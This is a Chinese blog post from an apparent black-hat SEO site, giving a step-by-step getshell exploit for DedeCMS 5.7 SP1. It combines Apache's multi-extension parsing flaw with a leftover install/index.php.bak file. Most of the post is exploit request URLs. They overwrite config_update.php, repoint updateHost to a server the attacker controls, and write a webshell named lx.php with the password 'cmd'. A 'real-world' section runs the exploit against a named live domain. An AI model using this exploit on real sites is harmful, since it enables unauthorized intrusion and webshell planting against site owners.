黑帽SEO
免费发布泛目录 蜘蛛池 黑帽SEO工具

DEDECMS远程写入漏洞之Getshell

  1丶漏洞根源:

  这个漏洞主要由两个原因引起的,其中最重要的一个原因,便是开发者没有认识到Apache服务器解析文件的流程,从而导致安装文件在安装后居然可以被继续访问。这里简单解释下Apache解析文件的流程:

  当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。那么这样的话,像1.php.bak这样的文件名就会被当做php文件所解析。这也就是传说中的Apache解析漏洞。我自己搭了个dedecms-v5.7-sp1来测试。

  利用条件:首先,是目标站安装完cms后并没有删除install文件夹,漏洞文件为\install\index.php.bak

  2017-07-19

  标站点的Apache存在文件解析漏洞。即index.php.bak文件会被当做PHP脚本解析,代码如下图。

  

  到此,,我们可以利用index.php.bak文件 step 11中的代码,来在服务器上写入任意文件!

  由于远程要包含文件的服务器地址是通过 $updateHost 控制的,那我们首先利用代码来改写/data/admin/config_update.php这个文件,使我们可以自定义 $updateHost的值,那样就可以引用任何我们想要引用的文件啦!

  2丶利用方法:

  本地搭建一个网站 新建个127.0.0.1/dedecms/demodata.a.txt

  2017-07-19

  http://www.xisewbms.cn/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=/data/admin/config_update.php

  http://www.xisewbms.cn/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=lx.php&updateHost=http://127.0.0.1/

  即可生成http://www.xisewbms.cn/install/lx.php 密码cmd

  以下是实战:

  临时利用:http://www.xisewbms.cn/dedecms/demodata.a.txt

  2017-07-19

  目标网站:http://www.xisewbms.cn/

  首先访问一下 : http://www.xisewbms.cn/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=/data/admin/config_update.php

  2017-07-19

  然后访问一下:http://www.xisewbms.cn/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=lx.php&updateHost=http://www.xisewbms.cn/

DEDECMS远程写入漏洞之Getshell

  其中lx.php可以自定义

  2017-07-19

  即可生成/install/lx.php

  shell地址:http://www.xisewbms.cn/install/lx.php

  2017-07-19

未经允许不得转载:黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程 » DEDECMS远程写入漏洞之Getshell
分享到: 更多 (0)

黑帽SEO-实战SEO技术培训、泛目录站群、蜘蛛池、流量技术教程

不做韭菜坚决不做韭菜